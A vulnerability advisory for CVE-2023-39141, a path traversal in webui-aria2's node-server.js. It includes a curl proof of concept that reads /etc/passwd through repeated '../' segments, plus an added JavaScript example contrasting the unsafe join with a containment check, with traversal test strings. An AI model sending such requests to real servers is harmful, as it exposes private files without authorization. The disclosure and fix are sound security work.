Created August 14, 2023 15:11 (gist JafarAkhondali/528fe6c548b78f454911fb866b23f66e)
CVE-2023-39141 is reserved for this vulnerability.

Project link:
https://github.com/ziahamza/webui-aria2/

Vulnerability type:
Path traversal

Root cause: This line https://github.com/ziahamza/webui-aria2/blob/109903f0e2774cf948698cd95a01f77f33d7dd2c/node-server.js#L10 takes the file name from the URL input without checking that it resolves inside the serving directory.

PoC:
When `node-server.js` is used, an attacker can simply request files outside the serving path:
`curl --path-as-is http://localhost:8888/../../../../../../../../../../../../../../../../../../../../etc/passwd`

Impact: An attacker may read any file that the www user can read.

Vulnerable versions:
Right now all versions, including the latest commit "109903f0e2774cf948698cd95a01f77f33d7dd2c", are vulnerable.
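
A containment check of the kind the root cause calls for, shown beside the unsafe join pattern the advisory describes. This is an added example, not code from the project or from the gist author; the function names `unsafeResolve` and `resolveInsideRoot`, the root `/srv/webui/docs` and the sample requests are assumptions made for illustration.

```javascript
// Added example, not the project's code. Function names and the sample
// document root are assumptions made for illustration.
const path = require("path");

// Unsafe pattern described in the advisory: the URL path is joined to the
// serving directory and used as-is, so ".." segments climb out of it.
function unsafeResolve(root, requestUrl) {
  const pathname = requestUrl.split("?")[0];
  return path.join(root, pathname);
}

// Hardened form: decode, resolve to an absolute path, then require that the
// result is the root itself or sits below it. Returns null when rejected.
function resolveInsideRoot(root, requestUrl) {
  let pathname;
  try {
    pathname = decodeURIComponent(requestUrl.split("?")[0]);
  } catch (e) {
    return null; // malformed percent-encoding
  }
  if (pathname.includes("\0")) return null; // NUL is never valid in a file name
  const base = path.resolve(root);
  const target = path.resolve(base, "." + path.sep + pathname);
  // Compare against base + separator so a sibling such as "docs-private"
  // does not pass a plain prefix test.
  if (target !== base && !target.startsWith(base + path.sep)) return null;
  return target;
}

// Constructed sample requests (POSIX paths).
const ROOT = "/srv/webui/docs";
const samples = [
  "/index.html",
  "/../../../../etc/passwd",
  "/..%2f..%2fetc/passwd",
  "/../docs-private/key.pem",
];
for (const s of samples) {
  console.log(s, "->", unsafeResolve(ROOT, s), "|", resolveInsideRoot(ROOT, s));
}
```

The check is lexical only: if the serving directory can contain symlinks, resolve the target with `fs.realpathSync` and repeat the containment test on the result before opening the file.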